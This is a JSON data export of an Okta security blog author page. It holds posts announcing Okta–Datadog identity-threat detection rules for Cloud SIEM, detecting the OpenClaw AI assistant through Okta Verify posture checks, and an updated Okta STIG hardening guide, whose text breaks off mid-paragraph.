{
    "componentChunkName": "component---src-templates-blog-blog-author-blog-author-template-blog-author-template-js",
    "path": "/hackers/greg-foss",
    "result": {"data":{"contentfulSecOktaComAuthor":{"name":"Greg Foss","slug":"greg-foss","id":"060f5c6d-61f5-53b8-b144-1da729bb97cb","jobTitle":"Engineering Manager, Threat Detection Engineering, Datadog","bio":{"bio":"<p> Greg Foss is a cybersecurity leader with over 15 years of experience spanning threat research, security operations, and offensive security. As the Engineering Manager of Threat Detection Engineering at Datadog, he leads a team of elite threat hunters and detection engineers, developing cutting-edge defenses against sophisticated cloud-native intrusions by nation-state and criminally motivated adversaries.</p>"},"node_locale":"en","image":null,"sec_okta_com___blog_post":null},"allContentfulSecOktaComBlogPost":{"nodes":[{"slug":"/articles/2026/03/datadog-okta-collaboration","id":"8b19761b-a165-57cf-976e-de2261679e95","title":"Datadog and Okta Combine for New Customer Detections","date":"2026-03-07T12:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Comprehensive monitoring of identity activity is crucial to the security of any organization. A compromised identity can lead to widespread data breaches and significant financial loss. However, the challenge for many security teams is that effective detection engineering has historically required significant manual effort and dedicated resources. Analysts are required to observe techniques used for identity-based attacks and then write, test and optimize detections for their Security Information Event Management (SIEM) or logging platforms.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta’s Cyber Defense team is at the forefront of identity attacks, observing and developing new detections and reducing customers’ operational burden. 
This work is also powering security product innovations such as Okta \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/en-au/products/identity-threat-protection/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Identity Threat Protection\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" (ITP), which continually assesses user sessions using the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/identity-security/oktas-commitment-to-caep-and-ssf-pioneering-secure-interoperable-identity-standards/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Continuous Access Evaluation Profile (CAEP)\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" standard and enabling new security automation capabilities. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To further assist Okta customers, in May 2025 we took a foundational step and released the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Security Detection Catalog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", a repository of detection queries and preventative configurations designed to empower Okta customers to proactively identify and prevent potential security threats.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Today we are announcing a collaboration with the \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://securitylabs.datadoghq.com/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Security Research team at 
Datadog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" to make it even easier to implement these detections.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Together, we have enhanced the Out-of-the-Box (OotB) detection capabilities of \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.datadoghq.com/product/cloud-siem/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Datadog’s Cloud SIEM\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" by including rules from the Okta Security Detection Catalog. These rules have been engineered to enable the identification of identity-related threats with minimal configuration. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Crucially, this partnership is bi-directional. The enhanced logic developed by Datadog’s own Security Research team during this collaboration has been contributed back to the public \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Security Detection Catalog\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", ensuring that the broader security community benefits from this joint research regardless of their tooling. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"This integration goes beyond simple logging; it utilizes signal correlation, combining multiple signals from Okta’s system log, Identity Threat Protection, and \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/threat-insight/about-threatinsight.htm\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"ThreatInsights\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", to provide higher fidelity detections and reduce false positives.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Getting Started\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"These new detection rules are available now in Datadog Cloud SIEM, with plans to add new rules over time. Developed in collaboration between the Okta Detection and Response team and Datadog Security Engineers, these rules can be configured and run directly within the Datadog platform for any organization that ingests Okta System Log events.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"For those who are not Datadog customers, we have ensured this collaboration benefits the wider community as well. All foundational logic developed during this partnership has been contributed back to the public Okta Security Detection Catalog. 
This allows security teams using other SIEM platforms to review, adapt, and deploy these high-value detections within their own environments.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Preview The New Detections:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" View Datadog’s Out-of-the-Box Default Rules for Okta here.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Ingest Okta System Logs:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Follow the instructions here to integrate Okta with your Datadog instance.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Enable the New Detections:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Ensure the Okta customer detections are active within your Datadog environment.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Review Alerting Policies:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Customize alerting thresholds and notification channels to fit your organisation's needs.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"New Detection Rule Highlights\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To give you an idea of the capabilities now available, here are a few examples of the new rules 
and the specific identity threats they help detect:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta OAuth mismatched URI\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Tactic:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Credential Access\\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Technique:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Steal Application Access Token (\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1528/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"T1528\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\")\\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Description: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"This rule monitors failed OAuth access token grant activity where the provided reason is \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"mismatched_redirect_uri.\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Alert severity is increased if Okta’s provided \\\"threat suspected\\\" field evaluates to true. 
This is critical for detecting adversaries leveraging phishing infrastructure; they may attempt to compromise users by issuing redirects to a phishing domain during the OAuth flow.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta policy rule modified to downgrade MFA\\nTactic: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Defense Evasion\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"\\nTechnique: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Modify Authentication Process: Multi-Factor Authentication (\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1556/006/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"T1556.006\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\")\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"\\nDescription: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"This rule monitors when an administrator updates an Okta policy rule (indicated by a policy.rule.update event). When the previous policy logic did not contain 1FA but the updated logic does, an alert will trigger. A higher‑severity alert is generated when the source IP address has been classified as suspicious or malicious. 
Downgrading multi-factor authentication (MFA) requirements reduces security posture and can be used by an attacker to maintain persistence or facilitate account compromise via social engineering.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta phone number assigned to multiple users\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Tactic:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Persistence\\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Technique:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" Account Manipulation: Device Registration (\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1098/005/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"T1098.005\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\")\\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Description: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"This rule monitors phone number enrollment verification by SMS within a short period. 
The reuse of a single phone number across multiple user accounts is a strong indicator of an attacker trying to maintain persistence or enroll a controlled device across compromised accounts.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Okta temporary password granted and MFA reset\\nTactic: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Persistence\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"\\nTechnique: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Account Manipulation (\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://attack.mitre.org/techniques/T1098/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"T1098\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\") \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Description: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"This rule monitors Okta account recovery and factor administration events, alerting when both user.account.expire_password and user.mfa.factor.reset_all succeed for the same account. When an administrator expires a user password, they may generate a temporary password which an attacker can use to login and set their own. If factors are also reset, the attacker can register their own MFA devices. This behavior is a strong signal of account takeover, especially when stemming from uncommon locations or hosting provider IP addresses.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Conclusion\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"In a decentralized cloud environment, identity sprawl can quickly lead to chaos. 
Okta brings structure to this landscape by centralizing access, provisioning, and governance across an organization’s entire application stack.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Because Okta is the chosen platform for protecting access to these critical resources, administrative access to Okta must be treated as highly privileged. Just as you monitor your most sensitive infrastructure, monitoring the platform that governs access to it is a fundamental security practice.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Together, Okta and Datadog enable organizations to safeguard this centralized control point, arming security teams with the high-fidelity signals and pre-built intelligence needed to detect and respond to threats at scale in real-time.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Resources:\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Okta Security Detection Catalog:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://github.com/okta/customer-detections\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"https://github.com/okta/customer-detections\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Okta Identity Threat Protection:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" 
\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/en-au/products/identity-threat-protection/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"https://www.okta.com/en-au/products/identity-threat-protection/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \\n\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\"Datadog Default Rules for Okta:\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://docs.datadoghq.com/security/default_rules/?search=okta\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"https://docs.datadoghq.com/security/default_rules/?search=okta\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\"\\nDatadog Cloud SIEM: \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.datadoghq.com/product/cloud-siem/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"value\":\"https://www.datadoghq.com/product/cloud-siem/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\" \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Okta and Datadog have collaborated to enhance the Out-of-the-Box (OotB) detection capabilities of Datadog’s Cloud SIEM by including rules from the Okta Security Detection Catalog. These rules have been engineered to enable the identification of identity-related threats with minimal configuration. 
"},"updatedAt":"2026-03-11T13:00:15.369Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"},{"id":"9f195fb3-2707-5759-a818-4a417280f582","bio":{"bio":"<p> Tom is a Staff Detection and Response Engineer within Okta’s Defensive Cyber Operations team. Tom has spent two decades in the  security industry and is an expert at intrusion research, incident response and engineering secure systems, which he’s demonstrated at Okta, TikTok, CrowdStrike, and in the Australian Defence industry. Tom currently holds the GSEC, GCIH and GREM, previously volunteering as a SANS teaching assistant. He enjoys researching the latest trends in adversary tactics and sharing his findings through security research blogs and conference talks.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/il6yytExKSSeXHdwvwkpR/b957a8aaf8f9fa7ec963bb62b6d9e289/tom.png"},"name":"Tom Simpson","jobTitle":"Staff Detection and Response Engineer","slug":"tom-simpson","node_locale":"en"},{"id":"cdd9fb32-226d-558d-a986-4084b4f3dc5a","bio":{"bio":"<p> Jordan is a cybersecurity leader specialising in security operations, threat intelligence, and security engineering. With a career in technology that began as a teen, Jordan brings nearly two decades of experience to his role as a Senior Manager within Okta’s Cyber Defense team. 
He leads an expert group of engineers dedicated to building the defenses and response capabilities required to promptly identify, contain, and evict advanced persistent threats from Okta’s environment.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/4LyCQIOujOjDJDzFjU7aSW/c09849ac8281c32a39dd5d30d58078b2/jordan.jpg"},"name":"Jordan Ruocco","jobTitle":"Senior Manager, Okta Cyber Defense Team","slug":"jordan-ruocco","node_locale":"en"},{"id":"95387d00-f345-53e4-b163-89443cfea8d0","bio":{"bio":"<p> Julie Agnes Sparks is a Senior Security Engineer in the Security Research organization at Datadog. Julie has previous experience on detection and response teams at Brex and Cloudflare with a focus on how to identify attacks, help the organization stay on top of emerging threats, and mature detection processes. She prioritizes involvement and connection in the security community and mentoring women who are entering the field.</p>"},"image":null,"name":"Julie Agnes Sparks","jobTitle":"Senior Security Engineer, Security Research, Datadog","slug":"julie-agnes-sparks","node_locale":"en"},{"id":"060f5c6d-61f5-53b8-b144-1da729bb97cb","bio":{"bio":"<p> Greg Foss is a cybersecurity leader with over 15 years of experience spanning threat research, security operations, and offensive security. 
As the Engineering Manager of Threat Detection Engineering at Datadog, he leads a team of elite threat hunters and detection engineers, developing cutting-edge defenses against sophisticated cloud-native intrusions by nation-state and criminally motivated adversaries.</p>"},"image":null,"name":"Greg Foss","jobTitle":"Engineering Manager, Threat Detection Engineering, Datadog","slug":"greg-foss","node_locale":"en"}]},{"slug":"/articles/2026/02/st-detecting-openclaw","id":"17eb06f7-1bbf-5303-bb7f-0ac37dbfd11a","title":"Detecting OpenClaw at Sign-In","date":"2026-02-11T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If like most organizations you are still coming to grips with the implications of what personal AI assistants like OpenClaw mean for your security posture, you might need to at least identify where they are being used.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Turns out Okta Verify can do that for you.\\n\\nAdvanced posture checks is an early access feature in the Okta Verify client that gives administrators the ability to  write custom rules that evaluate device hygiene at sign-in. 
\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Administrators can write simple osquery checks that evaluate, for example:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Persistant services and installed apps\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Currently running processes\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The presence of configuration files and binaries in common installation paths.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Installs of Homebrew or npm packages\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Listening ports\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Docker images and artifacts \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"list-item\"}],\"nodeType\":\"unordered-list\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"There are multiple ways you can apply this to something like OpenClaw, and lots of good reasons to do it.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"A personal AI assistant doesn’t need to be malicious or vulnerable for you to want to wrap some policy around 
its use on corporate-issued devices. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"blockquote\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"For a list of sample queries relevant to OpenClaw, head over to the Okta Threat Intelligence blog:\\n\",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/blog/threat-intelligence/detecting-openclaw-advanced-posture-checks/\"},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"https://www.okta.com/blog/threat-intelligence/detecting-openclaw-advanced-posture-checks/\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"}],\"nodeType\":\"document\"}"},"summary":{"summary":"Okta Verify has a neat trick under the hood that can help you identify the use of personal AI assistants and other \"not just yet\" software."},"updatedAt":"2026-02-11T04:22:55.937Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2026/02/okta-STIG-hardening-nhi","id":"31baf94f-abf3-5a6b-8ce1-032050f45ce2","title":"Okta Hardening Guide Updated to Secure Non-Human Identities","date":"2026-02-03T08:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is proud to announce the latest version (1.1) of the Okta Security Technical Implementation Guide (STIG), which provides U.S. 
government agencies additional security hardening recommendations related to network security and non-human identities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"First published by Okta and the U.S. Defense Information Systems Agency (DISA) in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2025/05/oktas-new-stig/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"March 2025\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the Okta Identity as a Service (IDaaS) STIG provides instrumental hardening guidance for identity and security practitioners.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The new checks introduced in version 1.1 are critical for securing service accounts, integrations, users, automation, and AI agents. This updated guidance provides security mitigations in addition to protocols like \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://datatracker.ietf.org/doc/html/rfc9449\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"DPoP\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/integrations/cross-app-access/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cross App Access\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"With the updated version of the STIG, we introduce five new checks. 
These checks are important in the efforts to protect NHI use cases as well as aligning with the latest version of the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cyber.mil/dccs/dccs-documents\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"DoD Cloud Computing Security Requirements Guide (CC SRG)\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". One update to the CC SRG is: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Section 5.9.3.1\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“…PaaS/SaaS offerings must ensure that exposing any allowlisted services does not enable all Mission Owner or tenants internet facing access by default. This can be accomplished through implementing internal firewall rules, proxies or other solutions that are compatible with the CSOs specific infrastructure and offerings.”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For commercial entities reading this, it essentially means don’t open your services to the internet by default. Our updated guidance provides the checks to help lock down access by IP, IP Range, or Geographic location. In addition to the network restrictions, we added a check to help block ‘anonymized proxies’, which are often a source of malicious traffic. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The FedRAMP Program Management Office (PMO) requires Cloud Service Providers (CSPs) to provide “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.fedramp.gov/docs/rev5/balance/recommended-secure-configuration/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommended Secure Configuration\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"” related to their service offerings. The Okta IDaaS STIG is Okta’s “Recommended Secure Configuration.” The benefit of doing a STIG is the additional independent validation and assessment provided by DISA. Our collaboration with DISA has been extremely valuable. We share the mission of helping our customers become as secure as possible. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Commercial customers should take a risk-based approach to determine which STIGs to apply. We understand that commercial CSPs and vendors will often pursue maximum compatibility for customers, nevertheless these additional checks can be used for all privileged access (administrative and NHI) use cases. 
